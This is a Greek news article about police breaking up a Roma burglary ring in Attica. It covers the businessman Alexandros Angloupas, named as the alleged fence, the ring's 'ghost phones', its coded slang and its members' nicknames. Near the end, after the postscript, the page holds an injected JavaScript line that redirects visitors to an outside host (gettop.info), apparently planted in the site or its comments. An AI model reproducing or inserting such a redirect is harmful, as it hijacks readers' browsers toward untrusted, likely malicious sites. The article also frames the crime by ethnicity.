Το facebook πρόδωσε τη σπείρα των Ρομά και τον Αγγλούπα

1
94

Μέσω… έφτασε η αστυνομία στην εξάρθρωση του κυκλώματος των Ρομά, το οποίο έκλεβε σπίτια πλουσίων (κυρίως μεζονέτες) και γραφεία εταιρειών και εργοστασίων στη βορειοανατολική Αττική.

Πώς; Διεπίστωσαν ότι πολλά άτομα έδειχναν να απολαμβάνουν πολυτελή βίο, αν και τα περισσότερα ήταν χωρίς δουλειά. Ζούσαν σε μεζονέτες και οδηγούσαν πολυτελή αυτοκίνητα, ενώ ο τρόπος ζωής τους δεν συμβάδιζε με το… εισόδημά τους.

Σύμφωνα με τη δικογραφία τα κλοπιμαία (κοσμήματα, πανάκριβα ρολόγια, πολυτελή αυτοκίνητα) αξιολογούσε ο επιχειρηματίας Aλέξανδρος Αγγλούπας, ο οποίος δρώντας ως κλεπταποδόχος τα αγόραζε και, στη συνέχεια. τα πούλαγε σε κοσμηματοπωλεία του Κολωνακίου.

Οι 89 συλληφθέντες (μεταξύ τους και τρεις αστυνομικοί) χρησιμοποιοιούσαν για την επικοινωνία τους τηλέφωνα «ghost phones», δηλαδή με νούμερα που ανήκαν σε ανύπαρκτα ή τυχαία και άσχετα πρόσωπα

Η δράση τους ξεκίνησε το 2015 και είχαν αναπτύξει κώδικα επικοινωνίας, ώστε να μην καταλαβαίνει κανείς το περιεχόμενο των συνομιλιών τους -ακόμη και αν τις υπέκλεπτε.

Χαρακτηριστικά για να πουν «πάμε για κλοπή» έλεγαν:
Πάμε για μπάλα ή 5χ5
– Πάμε για δουλειά
– Πάμε βόλτα
– Μπουκί
– Πιριμάσκι

Αντίστοιχα, με τις λέξεις «ράδιο, ραδιόφωνο, κασετόφωνο, cd, μπασαλντό» εννοούσαν τον ασύρματο, ενώ με τη φράση «έχω Έλληνα» εννοούσαν «έχω πληροφοριοδότη».

Φυσικά, δεν θα μπορούσαν να επικοινωνούν με τα πραγματικά τους ονόματα, όποτε και χρησιμοποιούσαν ψευδώνυμα, που σε ορισμένες περιπτώσεις ήταν εξαιρετικά ευφάνταστα.

Κάποιοι εκ των εγκεφάλων της σπείρας είναι ο «εισαγγελέας», ο «Παρταούλας», ο «Πιν Πιν», ο «Ρόκι», ο «Παχύς – Βενιζέλος», ο «Μπάμπης ο Φλου» και ο «Ράμπος».

Το σύστημα αποτελείτο από 4 εγκληματικές ομάδες. Η πρώτη χαρακτηριζόταν από «επαγγελματισμό και την αποτελεσματικότητά της», η δεύτερη είχε ως ορμητήριο τον Ασπρόπυργο, η τρίτη δραστηριοποιείτο σε περιοχές εκτός Αττικής και η τελευταία επεκτάθηκε σε Θεσσαλονίκη και άλλες πόλεις της χώρας, σύμφωνα με τη δικογραφία.

ΥΓ Η φωτογραφία είναι από βεγγέρα την εποχή της σχέσης του με την Όλγα Φαρμάκη.

. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

1 ΣΧΟΛΙΟ

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here